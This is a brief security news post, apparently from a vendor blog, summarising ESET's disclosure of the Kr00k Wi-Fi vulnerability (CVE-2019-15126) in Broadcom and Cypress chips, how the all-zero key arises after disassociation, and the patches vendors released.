A new vulnerability was recently discovered that could potentially allow attackers to obtain sensitive information from over one billion Wi-Fi-capable devices.
Kr00k (CVE-2019-15126) is the latest vulnerability that's been shown to caused devices to use an all-zero encryption key to encrypt part of a user's communications, allowing hackers to decrypt some wireless network packets transmitted by impacted devices.
This vulnerability is related to the infamous KRACK (Key Reinstallation Attacks) that was originally discovered back in 2017. However, researchers claim there are a few key differences.
Kr00k affects devices using Wi-Fi chips produced by Broadcomm and Cypress. Some devices that are affected by this vulnerability include smartphones, tablets, laptops, IoT devices, and routers.
ESET reported its findings to Broadcomm and Cypress last summer and the vendors have since released patches to address them, which many devices have already received patches for. Before these patches were deployed, ESET estimates that more than one billion devices were vulnerable to a potential Kr00k attack.
The vulnerability is triggered following a disassociation - when a device is disconnected from a Wi-Fi network because of signal interference, switching access points, or disabling Wi-Fi features on a device.
Once disassociated, the session key stored in the Wireless Network Interface Controller's (WNIC) Wi-Fi chip is cleared in memory and set to zero.
Following a reassociation, an attacker within close proximity of the targeted connected can collect these data frames and decrypt them, allowing attackers to obtain several kilobytes of sensitive data.
ESET claims that hackers can manually trigger disassociations and reassociations to collect even more data frames and increase their likelihood of gathering sensitive information. The company also claims that communications protected by TLS cannot be recovered using this attack method.
>> For more information on this vulnerability, read ESET's complete research paper.
>> Learn about NNT's Vulnerability Scanning & Remediation solution